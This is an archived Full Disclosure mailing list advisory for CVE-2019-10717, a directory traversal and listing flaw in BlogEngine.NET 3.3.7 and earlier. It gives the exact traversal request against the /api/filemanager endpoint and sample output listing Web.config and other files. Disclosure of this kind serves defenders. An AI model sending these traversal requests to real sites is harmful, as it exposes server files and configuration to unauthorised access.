Full Disclosure mailing list archives
BlogEngine.NET 3.3.7 and earlier Directory Traversal + Listing
From: aaron bishop <abishop () linux com>
Date: Mon, 24 Jun 2019 17:42:26 -0600
*CVE-2019-10717* - A Directory Traversal + Directory Listing exists on BlogEngine.Net 3.3.7 and earlier through the *path* parameter used by the /api/filemanager endpoint. A request such as: https://$HOST/api/filemanager?path=*%2F..%2f..%2f* Discloses the contents of the application root: .... { "IsChecked": false, "SortOrder": 25, "Created": "5/26/2018 1:53:02 PM", "Name": "Web.config", "FileSize": "19.41 kb", "FileType": 1, "FullPath": "/../../Web.config", "ImgPlaceholder": "fa fa-file-o" }, .... The contents of additional directories can be viewed by modifying the path: https://$HOST/api/filemanager?path=*%2F..%2f..%2fContent* ... { "IsChecked": false, "SortOrder": 15, "Created": "3/30/2019 9:09:23 PM", "Name": "toastr.scss", "FileSize": "6.92 kb", "FileType": 1, "FullPath": "/../../Content/toastr.scss", "ImgPlaceholder": "fa fa-file-o" } ... Disclosure: https://www.securitymetrics.com/blog/Blogenginenet-Directory-Traversal-Listing-Login-Page-Unvalidated-Redirect _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- BlogEngine.NET 3.3.7 and earlier Directory Traversal + Listing aaron bishop (Jun 24)